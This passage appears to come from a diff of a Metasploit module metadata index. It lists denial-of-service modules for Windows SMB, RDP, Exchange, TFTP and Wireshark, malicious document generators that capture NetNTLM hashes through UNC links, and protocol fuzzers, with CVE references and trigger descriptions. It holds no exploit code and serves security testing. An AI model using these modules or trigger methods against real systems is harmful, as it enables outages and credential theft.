"URL-http://stratsec.blogspot.com.au/2012/03/ms12-020-vulnerability-for-breakfast.html", - "EDB-18606", - "URL-https://www.rapid7.com/blog/post/2012/03/21/metasploit-update/" - ], - "platform": "", - "arch": "", - "rport": 3389, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-02-07 12:36:11 +0000", - "path": "/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb", - "is_install_path": true, - "ref_name": "dos/windows/rdp/ms12_020_maxchannelids", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/smb/ms05_047_pnp": { - "name": "Microsoft Plug and Play Service Registry Overflow", - "fullname": "auxiliary/dos/windows/smb/ms05_047_pnp", - "aliases": [], - "rank": 300, - 
"disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module triggers a stack buffer overflow in the Windows Plug\n and Play service. This vulnerability can be exploited on\n Windows 2000 without a valid user account. Since the PnP\n service runs inside the service.exe process, this module\n will result in a forced reboot on Windows 2000. Obtaining\n code execution is possible if user-controlled memory can\n be placed at 0x00000030, 0x0030005C, or 0x005C005C.", - "references": [ - "CVE-2005-2120", - "MSB-MS05-047", - "BID-15065", - "OSVDB-18830" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb", - "is_install_path": true, - "ref_name": "dos/windows/smb/ms05_047_pnp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/smb/ms06_035_mailslot": { - "name": "Microsoft SRV.SYS Mailslot Write Corruption", - "fullname": "auxiliary/dos/windows/smb/ms06_035_mailslot", - "aliases": [], - "rank": 300, - "disclosure_date": "2006-07-11", - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module triggers a kernel pool corruption bug in SRV.SYS. Each\n call to the mailslot write function results in a two byte return value\n being written into the response packet. The code which creates this packet\n fails to consider these two bytes in the allocation routine, resulting in\n a slow corruption of the kernel memory pool. 
These two bytes are almost\n always set to \"\\xff\\xff\" (a short integer with value of -1).", - "references": [ - "BID-19215", - "OSVDB-27644", - "CVE-2006-3942", - "URL-http://www.coresecurity.com/common/showdoc.php?idx=562&idxseccion=10", - "MSB-MS06-035" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb", - "is_install_path": true, - "ref_name": "dos/windows/smb/ms06_035_mailslot", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Attack", - "description": "Run Denial of Service" - } - ] - }, - "auxiliary_dos/windows/smb/ms06_063_trans": { - "name": "Microsoft SRV.SYS Pipe Transaction No Null", - "fullname": "auxiliary/dos/windows/smb/ms06_063_trans", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module exploits a NULL pointer dereference flaw in the\n SRV.SYS driver of the Windows operating system. 
This bug was\n independently discovered by CORE Security and ISS.", - "references": [ - "OSVDB-27644", - "MSB-MS06-063", - "CVE-2006-3942", - "BID-19215" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2020-05-13 16:34:47 +0000", - "path": "/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb", - "is_install_path": true, - "ref_name": "dos/windows/smb/ms06_063_trans", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/smb/ms09_001_write": { - "name": "Microsoft SRV.SYS WriteAndX Invalid DataOffset", - "fullname": "auxiliary/dos/windows/smb/ms09_001_write", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "j.v.vallejo " - ], - "description": "This module exploits a denial of service vulnerability in the\n SRV.SYS driver of the Windows operating system.\n\n This module has been tested successfully against Windows Vista.", - "references": [ - "MSB-MS09-001", - "OSVDB-48153", - "CVE-2008-4114", - "BID-31179" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2020-05-13 16:34:47 +0000", - "path": "/modules/auxiliary/dos/windows/smb/ms09_001_write.rb", - "is_install_path": true, - "ref_name": "dos/windows/smb/ms09_001_write", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/smb/ms09_050_smb2_negotiate_pidhigh": { - "name": "Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference", - "fullname": "auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh", - 
"aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Laurent Gaffie ", - "hdm " - ], - "description": "This module exploits an out of bounds function table dereference in the SMB\n request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7\n release candidates (not RTM), and Windows 2008 Server prior to R2. Windows\tVista\n without SP1 does not seem affected by this flaw.", - "references": [ - "CVE-2009-3103", - "BID-36299", - "OSVDB-57799", - "MSB-MS09-050", - "URL-https://seclists.org/fulldisclosure/2009/Sep/39" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb", - "is_install_path": true, - "ref_name": "dos/windows/smb/ms09_050_smb2_negotiate_pidhigh", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/smb/ms09_050_smb2_session_logoff": { - "name": "Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference", - "fullname": "auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "sf " - ], - "description": "This module triggers a NULL pointer dereference in the SRV2.SYS kernel driver when processing\n an SMB2 logoff request before a session has been correctly negotiated, resulting in a BSOD.\n Effecting Vista SP1/SP2 (And possibly Server 2008 SP1/SP2), the flaw was resolved with MS09-050.", - "references": [ - "CVE-2009-3103", - "OSVDB-57799", - "MSB-MS09-050" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": 
"/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb", - "is_install_path": true, - "ref_name": "dos/windows/smb/ms09_050_smb2_session_logoff", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/smb/ms10_006_negotiate_response_loop": { - "name": "Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop", - "fullname": "auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Laurent Gaffie ", - "hdm " - ], - "description": "This module exploits a denial of service flaw in the Microsoft\n Windows SMB client on Windows 7 and Windows Server 2008 R2. To trigger\n this bug, run this module as a service and forces a vulnerable client\n to access the IP of this system as an SMB server. This can be accomplished\n by embedding a UNC path (\\HOST\\share\\something) into a web page if the\n target is using Internet Explorer, or a Word document otherwise.", - "references": [ - "CVE-2010-0017", - "OSVDB-62244", - "MSB-MS10-006", - "URL-http://g-laurent.blogspot.com/2009/11/windows-7-server-2008r2-remote-kernel.html" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2017-08-24 21:38:44 +0000", - "path": "/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb", - "is_install_path": true, - "ref_name": "dos/windows/smb/ms10_006_negotiate_response_loop", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/smb/ms10_054_queryfs_pool_overflow": { - "name": "Microsoft Windows SRV.SYS SrvSmbQueryFsInformation Pool Overflow DoS", - "fullname": 
"auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Laurent Gaffie ", - "jduck " - ], - "description": "This module exploits a denial of service flaw in the Microsoft\n Windows SMB service on versions of Windows prior to the August 2010 Patch\n Tuesday. To trigger this bug, you must be able to access a share with\n at least read privileges. That generally means you will need authentication.\n However, if a system has a guest accessible share, you can trigger it\n without any authentication.", - "references": [ - "CVE-2010-2550", - "OSVDB-66974", - "MSB-MS10-054", - "URL-https://seclists.org/fulldisclosure/2010/Aug/122" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2020-05-13 16:34:47 +0000", - "path": "/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb", - "is_install_path": true, - "ref_name": "dos/windows/smb/ms10_054_queryfs_pool_overflow", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/smb/ms11_019_electbowser": { - "name": "Microsoft Windows Browser Pool DoS", - "fullname": "auxiliary/dos/windows/smb/ms11_019_electbowser", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Cupidon-3005", - "jduck " - ], - "description": "This module exploits a denial of service flaw in the Microsoft\n Windows SMB service on versions of Windows Server 2003 that have been\n configured as a domain controller. 
By sending a specially crafted election\n request, an attacker can cause a pool overflow.\n\n The vulnerability appears to be due to an error handling a length value\n while calculating the amount of memory to copy to a buffer. When there are\n zero bytes left in the buffer, the length value is improperly decremented\n and an integer underflow occurs. The resulting value is used in several\n calculations and is then passed as the length value to an inline memcpy\n operation.\n\n Unfortunately, the length value appears to be fixed at -2 (0xfffffffe) and\n causes considerable damage to kernel heap memory. While theoretically possible,\n it does not appear to be trivial to turn this vulnerability into remote (or\n even local) code execution.", - "references": [ - "CVE-2011-0654", - "BID-46360", - "OSVDB-70881", - "MSB-MS11-019", - "EDB-16166", - "URL-https://seclists.org/fulldisclosure/2011/Feb/285" - ], - "platform": "", - "arch": "", - "rport": 138, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb", - "is_install_path": true, - "ref_name": "dos/windows/smb/ms11_019_electbowser", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/smb/rras_vls_null_deref": { - "name": "Microsoft RRAS InterfaceAdjustVLSPointers NULL Dereference", - "fullname": "auxiliary/dos/windows/smb/rras_vls_null_deref", - "aliases": [], - "rank": 300, - "disclosure_date": "2006-06-14", - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module triggers a NULL dereference in svchost.exe on\n all current versions of Windows that run the RRAS service. 
This\n service is only accessible without authentication on Windows XP\n SP1 (using the SRVSVC pipe).", - "references": [ - "OSVDB-64340" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb", - "is_install_path": true, - "ref_name": "dos/windows/smb/rras_vls_null_deref", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Attack", - "description": "Run Denial of Service" - } - ] - }, - "auxiliary_dos/windows/smb/vista_negotiate_stop": { - "name": "Microsoft Vista SP0 SMB Negotiate Protocol DoS", - "fullname": "auxiliary/dos/windows/smb/vista_negotiate_stop", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module exploits a flaw in Windows Vista that allows a remote\n unauthenticated attacker to disable the SMB service. 
This vulnerability\n was silently fixed in Microsoft Vista Service Pack 1.", - "references": [ - "OSVDB-64341" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb", - "is_install_path": true, - "ref_name": "dos/windows/smb/vista_negotiate_stop", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/smtp/ms06_019_exchange": { - "name": "MS06-019 Exchange MODPROP Heap Overflow", - "fullname": "auxiliary/dos/windows/smtp/ms06_019_exchange", - "aliases": [], - "rank": 300, - "disclosure_date": "2004-11-12", - "type": "auxiliary", - "author": [ - "pusscat " - ], - "description": "This module triggers a heap overflow vulnerability in MS\n Exchange that occurs when multiple malformed MODPROP values\n occur in a VCAL request.", - "references": [ - "BID-17908", - "CVE-2006-0027", - "MSB-MS06-019" - ], - "platform": "", - "arch": "", - "rport": 25, - "autofilter_ports": [ - 25, - 465, - 587, - 2525, - 25025, - 25000 - ], - "autofilter_services": [ - "smtp", - "smtps" - ], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb", - "is_install_path": true, - "ref_name": "dos/windows/smtp/ms06_019_exchange", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/ssh/sysax_sshd_kexchange": { - "name": "Sysax Multi-Server 6.10 SSHD Key Exchange Denial of Service", - "fullname": "auxiliary/dos/windows/ssh/sysax_sshd_kexchange", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-03-17", - "type": "auxiliary", - "author": [ - "Matt \"hostess\" Andreko " - ], - 
"description": "This module sends a specially-crafted SSH Key Exchange causing the service to\n crash.", - "references": [ - "OSVDB-92081", - "URL-https://www.mattandreko.com/2013/04/sysax-multi-server-610-ssh-dos.html" - ], - "platform": "", - "arch": "", - "rport": 22, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb", - "is_install_path": true, - "ref_name": "dos/windows/ssh/sysax_sshd_kexchange", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/tftp/pt360_write": { - "name": "PacketTrap TFTP Server 2.2.5459.0 DoS", - "fullname": "auxiliary/dos/windows/tftp/pt360_write", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-10-29", - "type": "auxiliary", - "author": [ - "kris katterjohn " - ], - "description": "The PacketTrap TFTP server version 2.2.5459.0 can be\n brought down by sending a special write request.", - "references": [ - "CVE-2008-1311", - "OSVDB-42932", - "EDB-6863" - ], - "platform": "", - "arch": "", - "rport": 69, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/windows/tftp/pt360_write.rb", - "is_install_path": true, - "ref_name": "dos/windows/tftp/pt360_write", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/tftp/solarwinds": { - "name": "SolarWinds TFTP Server 10.4.0.10 Denial of Service", - "fullname": "auxiliary/dos/windows/tftp/solarwinds", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-05-21", - "type": "auxiliary", - "author": [ - "Nullthreat" - ], - "description": "The SolarWinds TFTP server can be shut down by 
sending a 'netascii' read\n request with a specially crafted file name.", - "references": [ - "CVE-2010-2115", - "OSVDB-64845", - "EDB-12683" - ], - "platform": "", - "arch": "", - "rport": 69, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/windows/tftp/solarwinds.rb", - "is_install_path": true, - "ref_name": "dos/windows/tftp/solarwinds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/wireshark/capwap": { - "name": "Wireshark CAPWAP Dissector DoS", - "fullname": "auxiliary/dos/wireshark/capwap", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-04-28", - "type": "auxiliary", - "author": [ - "Laurent Butti", - "j0sm1" - ], - "description": "This module injects a malformed UDP packet to crash Wireshark and TShark 1.8.0 to 1.8.7, as well\n as 1.6.0 to 1.6.15. 
The vulnerability exists in the CAPWAP dissector which fails to handle a\n packet correctly when an incorrect length is given.", - "references": [ - "CVE-2013-4074", - "OSVDB-94091", - "BID-60500" - ], - "platform": "", - "arch": "", - "rport": 5247, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/wireshark/capwap.rb", - "is_install_path": true, - "ref_name": "dos/wireshark/capwap", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/wireshark/chunked": { - "name": "Wireshark chunked_encoding_dissector Function DOS", - "fullname": "auxiliary/dos/wireshark/chunked", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-02-22", - "type": "auxiliary", - "author": [ - "Matteo Cantoni " - ], - "description": "Wireshark crash when dissecting an HTTP chunked response.\n Versions affected: 0.99.5 (Bug 1394)", - "references": [ - "CVE-2007-3389", - "OSVDB-37643", - "URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1394" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/wireshark/chunked.rb", - "is_install_path": true, - "ref_name": "dos/wireshark/chunked", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/wireshark/cldap": { - "name": "Wireshark CLDAP Dissector DOS", - "fullname": "auxiliary/dos/wireshark/cldap", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-03-01", - "type": "auxiliary", - "author": [ - "joernchen (Phenoelit)>" - ], - "description": "This module causes infinite recursion to occur within the\n CLDAP dissector by sending a specially 
crafted UDP packet.", - "references": [ - "CVE-2011-1140", - "OSVDB-71552", - "URL-https://www.wireshark.org/security/wnpa-sec-2011-04.html", - "URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5717" - ], - "platform": "", - "arch": "", - "rport": 389, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/dos/wireshark/cldap.rb", - "is_install_path": true, - "ref_name": "dos/wireshark/cldap", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/wireshark/ldap": { - "name": "Wireshark LDAP Dissector DOS", - "fullname": "auxiliary/dos/wireshark/ldap", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-03-28", - "type": "auxiliary", - "author": [ - "MC " - ], - "description": "The LDAP dissector in Wireshark 0.99.2 through 0.99.8 allows remote attackers\n to cause a denial of service (application crash) via a malformed packet.", - "references": [ - "CVE-2008-1562", - "OSVDB-43840" - ], - "platform": "", - "arch": "", - "rport": 389, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/dos/wireshark/ldap.rb", - "is_install_path": true, - "ref_name": "dos/wireshark/ldap", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fileformat/badpdf": { - "name": "BADPDF Malicious PDF Creator", - "fullname": "auxiliary/fileformat/badpdf", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Assaf Baharav", - "Yaron Fruchtmann", - "Ido Solomon", - "Richard Davy - secureyourit.co.uk" - ], - "description": "This module can either creates a blank PDF file which contains a UNC link which can be used\n 
to capture NetNTLM credentials, or if the PDFINJECT option is used it will inject the necessary\n code into an existing PDF document if possible.", - "references": [ - "CVE-2018-4993", - "URL-https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/fileformat/badpdf.rb", - "is_install_path": true, - "ref_name": "fileformat/badpdf", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fileformat/multidrop": { - "name": "Windows SMB Multi Dropper", - "fullname": "auxiliary/fileformat/multidrop", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Richard Davy - secureyourit.co.uk", - "mubix ", - "asoto-r7", - "hyp3rlinx", - "bcoles " - ], - "description": "This module dependent on the given filename extension creates either\n a .lnk, .scf, .url, .xml, .library-ms, or desktop.ini file which includes\n a reference to the specified remote host, causing SMB connections to be\n initiated from any user that views the file.", - "references": [ - "URL-https://malicious.link/blog/2012/02/11/ms08_068-ms10_046-fun-until-2018", - "URL-https://malicious.link/post/2012/2012-02-19-developing-the-lnk-metasploit-post-module-with-mona/", - "URL-https://bohops.com/2018/08/04/capturing-netntlm-hashes-with-office-dot-xml-documents/", - "URL-https://web.archive.org/web/20190106181024/https://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.LIBRARY-MS-FILETYPE-INFORMATION-DISCLOSURE.txt" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-05-02 01:28:52 +0000", - "path": 
"/modules/auxiliary/fileformat/multidrop.rb", - "is_install_path": true, - "ref_name": "fileformat/multidrop", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fileformat/odt_badodt": { - "name": "LibreOffice 6.03 /Apache OpenOffice 4.1.5 Malicious ODT File Generator", - "fullname": "auxiliary/fileformat/odt_badodt", - "aliases": [], - "rank": 300, - "disclosure_date": "2018-05-01", - "type": "auxiliary", - "author": [ - "Richard Davy - secureyourit.co.uk" - ], - "description": "Generates a Malicious ODT File which can be used with auxiliary/server/capture/smb or similar to capture hashes.", - "references": [ - "CVE-2018-10583", - "URL-https://secureyourit.co.uk/wp/2018/05/01/creating-malicious-odt-files/" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2018-06-06 11:26:20 +0000", - "path": "/modules/auxiliary/fileformat/odt_badodt.rb", - "is_install_path": true, - "ref_name": "fileformat/odt_badodt", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fileformat/word_unc_injector": { - "name": "Microsoft Word UNC Path Injector", - "fullname": "auxiliary/fileformat/word_unc_injector", - "aliases": [ - "auxiliary/docx/word_unc_injector" - ], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "SphaZ " - ], - "description": "This module modifies a .docx file that will, upon opening, submit stored\n netNTLM credentials to a remote host. It can also create an empty docx file. If\n emailed the receiver needs to put the document in editing mode before the remote\n server will be contacted. Preview and read-only mode do not work. 
Verified to work\n with Microsoft Word 2003, 2007, 2010, and 2013. In order to get the hashes the\n auxiliary/server/capture/smb module can be used.", - "references": [ - "URL-https://web.archive.org/web/20140527232608/http://jedicorp.com/?p=534" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-04-30 18:26:15 +0000", - "path": "/modules/auxiliary/fileformat/word_unc_injector.rb", - "is_install_path": true, - "ref_name": "fileformat/word_unc_injector", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fuzzers/dns/dns_fuzzer": { - "name": "DNS and DNSSEC Fuzzer", - "fullname": "auxiliary/fuzzers/dns/dns_fuzzer", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "pello " - ], - "description": "This module will connect to a DNS server and perform DNS and\n DNSSEC protocol-level fuzzing. 
Note that this module may inadvertently\n crash the target server.", - "references": [], - "platform": "", - "arch": "", - "rport": 53, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2019-12-07 08:01:52 +0000", - "path": "/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb", - "is_install_path": true, - "ref_name": "fuzzers/dns/dns_fuzzer", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fuzzers/ftp/client_ftp": { - "name": "Simple FTP Client Fuzzer", - "fullname": "auxiliary/fuzzers/ftp/client_ftp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "corelanc0d3r " - ], - "description": "This module will serve an FTP server and perform FTP client interaction fuzzing", - "references": [ - "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/fuzzers/ftp/client_ftp.rb", - "is_install_path": true, - "ref_name": "fuzzers/ftp/client_ftp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fuzzers/ftp/ftp_pre_post": { - "name": "Simple FTP Fuzzer", - "fullname": "auxiliary/fuzzers/ftp/ftp_pre_post", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "corelanc0d3r ", - "jduck " - ], - "description": "This module will connect to a FTP server and perform pre- and post-authentication fuzzing", - "references": [], - "platform": "", - "arch": "", - "rport": 21, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2019-03-05 03:38:51 +0000", - "path": 
"/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb", - "is_install_path": true, - "ref_name": "fuzzers/ftp/ftp_pre_post", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fuzzers/http/http_form_field": { - "name": "HTTP Form Field Fuzzer", - "fullname": "auxiliary/fuzzers/http/http_form_field", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "corelanc0d3r", - "Paulino Calderon " - ], - "description": "This module will grab all fields from a form,\n and launch a series of POST actions, fuzzing the contents\n of the form fields. You can optionally fuzz headers too\n (option is enabled by default)", - "references": [ - "URL-http://www.corelan.be:8800/index.php/2010/11/12/metasploit-module-http-form-field-fuzzer" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/fuzzers/http/http_form_field.rb", - "is_install_path": true, - "ref_name": "fuzzers/http/http_form_field", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fuzzers/http/http_get_uri_long": { - "name": "HTTP GET Request URI Fuzzer (Incrementing Lengths)", - "fullname": "auxiliary/fuzzers/http/http_get_uri_long", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "nullthreat" - ], - "description": "This module sends a series of HTTP GET request with incrementing URL lengths.", - "references": [], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2017-07-24 
